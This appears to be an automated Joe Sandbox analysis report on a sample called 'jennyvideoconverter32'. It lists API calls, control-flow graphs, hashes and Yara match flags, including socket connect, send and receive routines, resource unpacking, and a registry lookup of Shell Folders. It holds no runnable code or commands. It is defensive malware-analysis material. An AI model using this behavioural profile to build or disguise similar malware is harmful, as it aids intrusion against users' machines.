                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02E21D11
                                                                            • GetLastError.KERNEL32 ref: 02E21D23
                                                                              • Part of subcall function 02E21712: __EH_prolog.LIBCMT ref: 02E21717
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02E21D59
                                                                            • GetLastError.KERNEL32 ref: 02E21D6B
                                                                            • __beginthreadex.LIBCMT ref: 02E21DB1
                                                                            • GetLastError.KERNEL32 ref: 02E21DC6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02E21DDD
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02E21DEC
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02E21E14
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 02E21E1B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                            • String ID: thread$thread.entry_event$thread.exit_event
                                                                            • API String ID: 831262434-3017686385
                                                                            • Opcode ID: 6f77219aae4b28c6778c8ffe1c9a80e4796a5461ccef106bd8ce7dcf9a1c6edb
                                                                            • Instruction ID: 7968b021e780c1e8e143ee8d3df991701c5e49a5be28813bcd22783c1d346e1b
                                                                            • Opcode Fuzzy Hash: 6f77219aae4b28c6778c8ffe1c9a80e4796a5461ccef106bd8ce7dcf9a1c6edb
                                                                            • Instruction Fuzzy Hash: 3C318975A843109FD700EF20C848B2BBBE5FB85315F109969F95A8B291DB709D49CFD2

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E24D8B
                                                                            • RtlEnterCriticalSection.NTDLL(02E571B8), ref: 02E24DB7
                                                                            • RtlLeaveCriticalSection.NTDLL(02E571B8), ref: 02E24DC3
                                                                              • Part of subcall function 02E24BED: __EH_prolog.LIBCMT ref: 02E24BF2
                                                                              • Part of subcall function 02E24BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02E24CF2
                                                                            • RtlEnterCriticalSection.NTDLL(02E571B8), ref: 02E24E93
                                                                            • RtlLeaveCriticalSection.NTDLL(02E571B8), ref: 02E24E99
                                                                            • RtlEnterCriticalSection.NTDLL(02E571B8), ref: 02E24EA0
                                                                            • RtlLeaveCriticalSection.NTDLL(02E571B8), ref: 02E24EA6
                                                                            • RtlEnterCriticalSection.NTDLL(02E571B8), ref: 02E250A7
                                                                            • RtlLeaveCriticalSection.NTDLL(02E571B8), ref: 02E250AD
                                                                            • RtlEnterCriticalSection.NTDLL(02E571B8), ref: 02E250B8
                                                                            • RtlLeaveCriticalSection.NTDLL(02E571B8), ref: 02E250C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                            • String ID:
                                                                            • API String ID: 2062355503-0
                                                                            • Opcode ID: 6032cbf159952a97ac8949b77f7a3c4f17c5862576453cfdf1b98c4b823636ae
                                                                            • Instruction ID: 0f0bc63fc01098ee566ee0ec73daffdaed98f75ad9e34d725ec947b62ab1510d
                                                                            • Opcode Fuzzy Hash: 6032cbf159952a97ac8949b77f7a3c4f17c5862576453cfdf1b98c4b823636ae
                                                                            • Instruction Fuzzy Hash: D1B13B71D4026DDFEF15DF90C944BEDBBB5AF04318F14905AE806BA280DBB45A49CFA2

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 858 401f64-401f84 FindResourceA 859 401f86-401f9d GetLastError SizeofResource 858->859 860 401f9f-401fa1 858->860 859->860 861 401fa6-401fec LoadResource LockResource GlobalAlloc call 402800 * 2 859->861 862 402096-40209a 860->862 867 401fee-401ff9 861->867 867->867 868 401ffb-402003 GetTickCount 867->868 869 402032-402038 868->869 870 402005-402007 868->870 871 402053-402083 GlobalAlloc call 401c26 869->871 873 40203a-40204a 869->873 870->871 872 402009-40200f 870->872 878 402088-402093 871->878 872->871 874 402011-402023 872->874 875 40204c 873->875 876 40204e-402051 873->876 879 402025 874->879 880 402027-40202a 874->880 875->876 876->871 876->873 878->862 879->880 880->874 881 40202c-40202e 880->881 881->872 882 402030 881->882 882->871
                                                                            APIs
                                                                            • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                            • GetLastError.KERNEL32 ref: 00401F86
                                                                            • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                            • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                            • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                            • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                            • GetTickCount.KERNEL32 ref: 00401FFB
                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                            • String ID:
                                                                            • API String ID: 564119183-0
                                                                            • Opcode ID: c339dbb3d4f54c4bfe23240511e1faf338c1a50a53de60f6f0a2310917010a4d
                                                                            • Instruction ID: 3f373f2fe47a9e58058ec223940fe379f908771e1a31376a549d0366c6000c22
                                                                            • Opcode Fuzzy Hash: c339dbb3d4f54c4bfe23240511e1faf338c1a50a53de60f6f0a2310917010a4d
                                                                            • Instruction Fuzzy Hash: D0314C32A402516FDB109FB99E889AF7FB8EF45344B10807AFA46F7291D6748841C7A8

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02E22706
                                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02E2272B
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02E45A93), ref: 02E22738
                                                                              • Part of subcall function 02E21712: __EH_prolog.LIBCMT ref: 02E21717
                                                                            • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02E22778
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02E227D9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                            • String ID: timer
                                                                            • API String ID: 4293676635-1792073242
                                                                            • Opcode ID: 0bb726e6e8e9edb6bbb4bc1f91f3968b552cd486ad764930abc1185cb0551884
                                                                            • Instruction ID: caa76d5d4b4e0a506529a64b53fb61f36bd68b331866ba02bf0c9f120efe6e5c
                                                                            • Opcode Fuzzy Hash: 0bb726e6e8e9edb6bbb4bc1f91f3968b552cd486ad764930abc1185cb0551884
                                                                            • Instruction Fuzzy Hash: D431C0B1889711AFD310DF25D944B66BBE8FB48725F009A2EF95687A80D770E814CFD1

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 934 2e22b95-2e22baf 935 2e22bb1-2e22bb9 call 2e30a50 934->935 936 2e22bc7-2e22bcb 934->936 943 2e22bbf-2e22bc2 935->943 937 2e22bdf 936->937 938 2e22bcd-2e22bd0 936->938 942 2e22be2-2e22c11 WSASetLastError WSARecv call 2e2a43c 937->942 938->937 941 2e22bd2-2e22bdd call 2e30a50 938->941 941->943 948 2e22c16-2e22c1d 942->948 946 2e22d30 943->946 949 2e22d32-2e22d38 946->949 950 2e22c1f-2e22c2a call 2e30a50 948->950 951 2e22c2c-2e22c32 948->951 962 2e22c3f-2e22c42 950->962 953 2e22c46-2e22c48 951->953 954 2e22c34-2e22c39 call 2e30a50 951->954 956 2e22c4a-2e22c4d 953->956 957 2e22c4f-2e22c60 call 2e30a50 953->957 954->962 960 2e22c66-2e22c69 956->960 957->949 957->960 964 2e22c73-2e22c76 960->964 965 2e22c6b-2e22c6d 960->965 962->953 964->946 967 2e22c7c-2e22c9a call 2e30a50 call 2e2166f 964->967 965->964 966 2e22d22-2e22d2d call 2e21996 965->966 966->946 974 2e22cbc-2e22cfa WSASetLastError select call 2e2a43c 967->974 975 2e22c9c-2e22cba call 2e30a50 call 2e2166f 967->975 981 2e22d08 974->981 982 2e22cfc-2e22d06 call 2e30a50 974->982 975->946 975->974 985 2e22d15-2e22d17 981->985 986 2e22d0a-2e22d12 call 2e30a50 981->986 987 2e22d19-2e22d1d 982->987 985->946 985->987 986->985 987->942
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02E22BE4
                                                                            • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02E22C07
                                                                              • Part of subcall function 02E2A43C: WSAGetLastError.WS2_32(00000000,?,?,02E22A51), ref: 02E2A44A
                                                                            • WSASetLastError.WS2_32 ref: 02E22CD3
                                                                            • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02E22CE7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$Recvselect
                                                                            • String ID: 3'
                                                                            • API String ID: 886190287-280543908
                                                                            • Opcode ID: 0d556a210446e9424b855a0b63dc6c4c757ee3bdb4e432dbc4727d7531419ee6
                                                                            • Instruction ID: 2feb6073b69292fd52bce12438128655fc9bf3c1d63703af9ac50369ecfb07a4
                                                                            • Opcode Fuzzy Hash: 0d556a210446e9424b855a0b63dc6c4c757ee3bdb4e432dbc4727d7531419ee6
                                                                            • Instruction Fuzzy Hash: 1F419FB09843118FDB109F64D4087ABBBE9BF84359F10A91EF99A87280EB70D548CF91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1042 2e229ee-2e22a06 1043 2e22ab3-2e22abb call 2e30a50 1042->1043 1044 2e22a0c-2e22a10 1042->1044 1053 2e22abe-2e22ac6 1043->1053 1045 2e22a12-2e22a15 1044->1045 1046 2e22a39-2e22a4c WSASetLastError closesocket call 2e2a43c 1044->1046 1045->1046 1048 2e22a17-2e22a36 call 2e30a50 call 2e22f50 1045->1048 1052 2e22a51-2e22a55 1046->1052 1048->1046 1052->1043 1055 2e22a57-2e22a5f call 2e30a50 1052->1055 1060 2e22a61-2e22a67 1055->1060 1061 2e22a69-2e22a71 call 2e30a50 1055->1061 1060->1061 1062 2e22a7b-2e22aad ioctlsocket WSASetLastError closesocket call 2e2a43c 1060->1062 1066 2e22a73-2e22a79 1061->1066 1067 2e22aaf-2e22ab1 1061->1067 1062->1067 1066->1062 1066->1067 1067->1043 1067->1053
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02E22A3B
                                                                            • closesocket.WS2_32 ref: 02E22A42
                                                                            • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02E22A89
                                                                            • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02E22A97
                                                                            • closesocket.WS2_32 ref: 02E22A9E
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastclosesocket$ioctlsocket
                                                                            • String ID:
                                                                            • API String ID: 1561005644-0
                                                                            • Opcode ID: 168e0970743d7487e5f170c8002966c916948dea67803dd10a3831d8436e5a6f
                                                                            • Instruction ID: 57383a4475db5ab611baca448b01e8108efca2bfbef5f3c21d7ae41194397cfc
                                                                            • Opcode Fuzzy Hash: 168e0970743d7487e5f170c8002966c916948dea67803dd10a3831d8436e5a6f
                                                                            • Instruction Fuzzy Hash: 73212DB59802159BDF209BB4D80876AB7F9AF44319F10D969FD47C3240EB70C949CB50

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1069 2e21ba7-2e21bcf call 2e45330 RtlEnterCriticalSection 1072 2e21bd1 1069->1072 1073 2e21be9-2e21bf7 RtlLeaveCriticalSection call 2e2e263 1069->1073 1074 2e21bd4-2e21be0 call 2e21b79 1072->1074 1076 2e21bfa-2e21c20 RtlEnterCriticalSection 1073->1076 1081 2e21be2-2e21be7 1074->1081 1082 2e21c55-2e21c6e RtlLeaveCriticalSection 1074->1082 1078 2e21c34-2e21c36 1076->1078 1079 2e21c22-2e21c2f call 2e21b79 1078->1079 1080 2e21c38-2e21c43 1078->1080 1083 2e21c45-2e21c4b 1079->1083 1087 2e21c31 1079->1087 1080->1083 1081->1073 1081->1074 1083->1082 1085 2e21c4d-2e21c51 1083->1085 1085->1082 1087->1078
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E21BAC
                                                                            • RtlEnterCriticalSection.NTDLL ref: 02E21BBC
                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02E21BEA
                                                                            • RtlEnterCriticalSection.NTDLL ref: 02E21C13
                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02E21C56
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$H_prolog
                                                                            • String ID:
                                                                            • API String ID: 1633115879-0
                                                                            • Opcode ID: c2ee279fcdefc080a5dec787fc0eaf1c07ef4858ada24ce57f8a66244b903a52
                                                                            • Instruction ID: c317d039018acad1cf4b25c040503b3925476d4934c5e1d44f678d956457aad1
                                                                            • Opcode Fuzzy Hash: c2ee279fcdefc080a5dec787fc0eaf1c07ef4858ada24ce57f8a66244b903a52
                                                                            • Instruction Fuzzy Hash: 4421BF79980214EFCB14CF68C44479ABBB5FF48714F10D589E85A9B302DBB0EA06CBE0

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetVersion.KERNEL32 ref: 00402D86
                                                                              • Part of subcall function 004039F0: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01
                                                                              • Part of subcall function 004039F0: HeapDestroy.KERNEL32 ref: 00403A40
                                                                            • GetCommandLineA.KERNEL32 ref: 00402DD4
                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00402DFF
                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402E22
                                                                              • Part of subcall function 00402E7B: ExitProcess.KERNEL32 ref: 00402E98
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                            • String ID:
                                                                            • API String ID: 2057626494-0
                                                                            • Opcode ID: 9e286e5f9a377e3797ece88135c359dedbbb575cc14907a13f37508a60b21901
                                                                            • Instruction ID: f31f1ce04d2051e6b9e8acf883bbbbaa5bd69f55a1c9941ff1c46623f1a3e60c
                                                                            • Opcode Fuzzy Hash: 9e286e5f9a377e3797ece88135c359dedbbb575cc14907a13f37508a60b21901
                                                                            • Instruction Fuzzy Hash: AD219FB0840715AADB04EFA6DE09A6E7BB8EB04704F10413FF502B72E2DB388510CB59
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02E22EEE
                                                                            • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02E22EFD
                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02E22F0C
                                                                            • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02E22F36
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$Socketsetsockopt
                                                                            • String ID:
                                                                            • API String ID: 2093263913-0
                                                                            • Opcode ID: 29883e348db58015c87ae139dceb0d68317556855a37ad8326c8ff55c948ff68
                                                                            • Instruction ID: 04393a9baedbe0f333d00ac8b19d62b1a36b153969d7738d6725e237071fb45d
                                                                            • Opcode Fuzzy Hash: 29883e348db58015c87ae139dceb0d68317556855a37ad8326c8ff55c948ff68
                                                                            • Instruction Fuzzy Hash: 1A017575980214BBDB209F66DC48F5ABBA9EB89761F00C965FE199B181D7708840CBA0
                                                                            APIs
                                                                              • Part of subcall function 02E22D39: WSASetLastError.WS2_32(00000000), ref: 02E22D47
                                                                              • Part of subcall function 02E22D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02E22D5C
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02E22E6D
                                                                            • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02E22E83
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$Sendselect
                                                                            • String ID: 3'
                                                                            • API String ID: 2958345159-280543908
                                                                            • Opcode ID: 7ea4d2ba39be2ddad0d1166b2e947f2a65d2b01565a366e4804727062068085d
                                                                            • Instruction ID: 133f7e3066d143b73111abfb9f27770a60f49ace857d511d532cd33d77b8d4d8
                                                                            • Opcode Fuzzy Hash: 7ea4d2ba39be2ddad0d1166b2e947f2a65d2b01565a366e4804727062068085d
                                                                            • Instruction Fuzzy Hash: AF31F0B1A802249FDF11DF60D808BEE7BBAEF05318F00D45AEE0A97240E7709548CFA0
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02E22AEA
                                                                            • connect.WS2_32(?,?,?), ref: 02E22AF5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastconnect
                                                                            • String ID: 3'
                                                                            • API String ID: 374722065-280543908
                                                                            • Opcode ID: 5380d34a1c6227584bab414ec33c1d4ec90b941e9d5d8dd6f0234ced8859d0f1
                                                                            • Instruction ID: f7752b7303ad222214956383c4defa6efc443cbf14b8db614556ea6fcef1d9b6
                                                                            • Opcode Fuzzy Hash: 5380d34a1c6227584bab414ec33c1d4ec90b941e9d5d8dd6f0234ced8859d0f1
                                                                            • Instruction Fuzzy Hash: E121F970E40214ABCF10EFB4D418AAEBBBAAF44324F00D559ED5A97380DB745609DFA1
                                                                            APIs
                                                                            • GetLastError.KERNEL32 ref: 0040223D
                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0040B500
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastLibraryLoad
                                                                            • String ID: 2
                                                                            • API String ID: 3568775529-4175869482
                                                                            • Opcode ID: 46a972f82e300271c5c0ad26d8b6c0500f2c65ead2251e592649c3a81edbb788
                                                                            • Instruction ID: 202b3bf2a9678272b0942fded1eb44736d11c3c9fef4d2a9126dfe260b1d5e4f
                                                                            • Opcode Fuzzy Hash: 46a972f82e300271c5c0ad26d8b6c0500f2c65ead2251e592649c3a81edbb788
                                                                            • Instruction Fuzzy Hash: 56D0A931E40208EFEB50AF208D8A7483AA0FB08300F610431BA03B8290C3B050408B5E
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: 7bde3debe00b7c71297af41ecd66593235dfefac218de2547fefdaf985dd066c
                                                                            • Instruction ID: 646a08307e386aa32826a4d9936718cfa73545ded8fc1e98328ad46e130b9000
                                                                            • Opcode Fuzzy Hash: 7bde3debe00b7c71297af41ecd66593235dfefac218de2547fefdaf985dd066c
                                                                            • Instruction Fuzzy Hash: 87514DB1944216DFCB05CF68D5446AABBF5FF08314F10D19EE86A9B380D774A915CFA0
                                                                            APIs
                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02E236A7
                                                                              • Part of subcall function 02E22420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02E22432
                                                                              • Part of subcall function 02E22420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02E22445
                                                                              • Part of subcall function 02E22420: RtlEnterCriticalSection.NTDLL(?), ref: 02E22454
                                                                              • Part of subcall function 02E22420: InterlockedExchange.KERNEL32(?,00000001), ref: 02E22469
                                                                              • Part of subcall function 02E22420: RtlLeaveCriticalSection.NTDLL(?), ref: 02E22470
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 1601054111-0
                                                                            • Opcode ID: 673d077cb199a3812b7305a1c928a71b9f1f00b624dcccf3aae17dd7e26e98d6
                                                                            • Instruction ID: 360d0594031123407945dae549f7f55080c3118879547d96617bf772a1b9be9f
                                                                            • Opcode Fuzzy Hash: 673d077cb199a3812b7305a1c928a71b9f1f00b624dcccf3aae17dd7e26e98d6
                                                                            • Instruction Fuzzy Hash: 7411C1B5280219ABDF218E14CC85FAB3BAAEF10354F109556FE57862D0C778E864CF94
                                                                            APIs
                                                                            • __beginthreadex.LIBCMT ref: 02E32046
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02E2A8BC,00000000), ref: 02E32077
                                                                            • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02E2A8BC,00000000), ref: 02E32085
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleResumeThread__beginthreadex
                                                                            • String ID:
                                                                            • API String ID: 1685284544-0
                                                                            • Opcode ID: d92aa6e975121c76417ac6d185ca31b021a50749210dca911a9a740f23de158f
                                                                            • Instruction ID: 3562966763288971f01f066661373a344f87dce5b1d749be2fd7f0bed50b9d55
                                                                            • Opcode Fuzzy Hash: d92aa6e975121c76417ac6d185ca31b021a50749210dca911a9a740f23de158f
                                                                            • Instruction Fuzzy Hash: EFF0C8702802005BD7209E6CDC84F91B3E8AF48325F244559F698D7280C371EC96CED0
                                                                            APIs
                                                                            • InterlockedIncrement.KERNEL32(02E5727C), ref: 02E21ABA
                                                                            • WSAStartup.WS2_32(00000002,00000000), ref: 02E21ACB
                                                                            • InterlockedExchange.KERNEL32(02E57280,00000000), ref: 02E21AD7
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Interlocked$ExchangeIncrementStartup
                                                                            • String ID:
                                                                            • API String ID: 1856147945-0
                                                                            • Opcode ID: 6817c70fed7ee88524d383ef25e28a578ef719202249ea74136bbdb3b44efb2b
                                                                            • Instruction ID: 52199ea9143163e407cbc6644588437f82a25cfc0acd1c444ef89e4979f24186
                                                                            • Opcode Fuzzy Hash: 6817c70fed7ee88524d383ef25e28a578ef719202249ea74136bbdb3b44efb2b
                                                                            • Instruction Fuzzy Hash: CDD05EB99D12145BE62066E1AD0EA78F7ACE706615F800A51FC6EC01C0EB516A7485E7
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: CloseEventValue
                                                                            • String ID:
                                                                            • API String ID: 3274066644-0
                                                                            • Opcode ID: 622d392b40578182c82d1c97e9e0572cec5adab44bc3c9c38859b9dc6ae99d88
                                                                            • Instruction ID: 5fb376b86e8a49f8134fd603d72217cd51757c679373552acc848ecac8247880
                                                                            • Opcode Fuzzy Hash: 622d392b40578182c82d1c97e9e0572cec5adab44bc3c9c38859b9dc6ae99d88
                                                                            • Instruction Fuzzy Hash: 67D09231448004EBCB016BE09E0D92D7E75BB05305B2504B9B203700A1C73914A1AB6E
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E5A000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e5a000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: `io
                                                                            • API String ID: 823142352-3782016954
                                                                            • Opcode ID: 5eaf7df61113aecfe9a69dc55255fd99c03dc4ac82179ce268798893521b3c95
                                                                            • Instruction ID: 0a9988f3be77f0f3c9575d4c1b900bb8773d97fe5c2185b8e7c723fb7593f7ba
                                                                            • Opcode Fuzzy Hash: 5eaf7df61113aecfe9a69dc55255fd99c03dc4ac82179ce268798893521b3c95
                                                                            • Instruction Fuzzy Hash: 52416AF150C604AFE719BF19EC8177AB7E5EF84310F06882DE6C487740EA3968548B97
                                                                            APIs
                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040B88A
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040B880
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                            • API String ID: 71445658-2036018995
